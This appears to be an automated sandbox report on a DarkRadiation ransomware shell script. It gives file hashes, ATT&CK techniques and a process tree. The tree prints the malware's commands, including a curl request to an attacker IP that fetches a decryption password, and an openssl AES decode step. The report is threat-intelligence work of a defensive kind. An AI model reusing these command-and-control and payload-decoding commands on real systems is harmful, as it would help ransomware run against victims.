55e90e18b443a15116c1102dd21397fd1c7dd1e9aff347e1267c27032e3e4bb3

Analysis

max time kernel
147s
max time network
78s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
14-10-2024 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
Size

17KB
MD5

8224c9faafd5f4a8678bfa511fc4b5e2
SHA1

215d777140728b748fc264ef203ebd27b2388666
SHA256

e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842
SHA512

3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038
SSDEEP

384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Score

7^/10

defense_evasion discovery execution

Malware Config

Signatures

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
816	openssl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/fd	apt-get

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fileutl.message.i9rWC4	apt-get
File opened for modification	/tmp/fileutl.message.Z8XPz5	apt-get
File opened for modification	/tmp/fileutl.message.QhiAfo	apt-get
File opened for modification	/tmp/fileutl.message.bo1R3Q	apt-get
File opened for modification	/tmp/sh-thd.KJdb5j	crypt2_first.sh

Software Deployment Tools 1 TTPs 1 IoCs

Use software deployment tools to execute code.

execution

Software Deployment Tools

T1072

pid	Process
817	apt-get

/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
"/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
1⤵
- Writes file to tmp directory
PID:719
- /usr/bin/curl
  curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
  2⤵
  - Reads runtime system information
  PID:725
- /usr/bin/openssl
  openssl enc -base64 -aes-256-cbc -d -pass pass:
  2⤵
  - Deobfuscate/Decode Files or Information
  PID:816
- /usr/bin/apt-get
  apt-get install curl --yes
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  - Software Deployment Tools
  PID:817
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:818
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:819

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Software Deployment Tools

T1072

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Credential Access

Discovery

Lateral Movement

Software Deployment Tools

T1072

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/sh-thd.KJdb5j

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads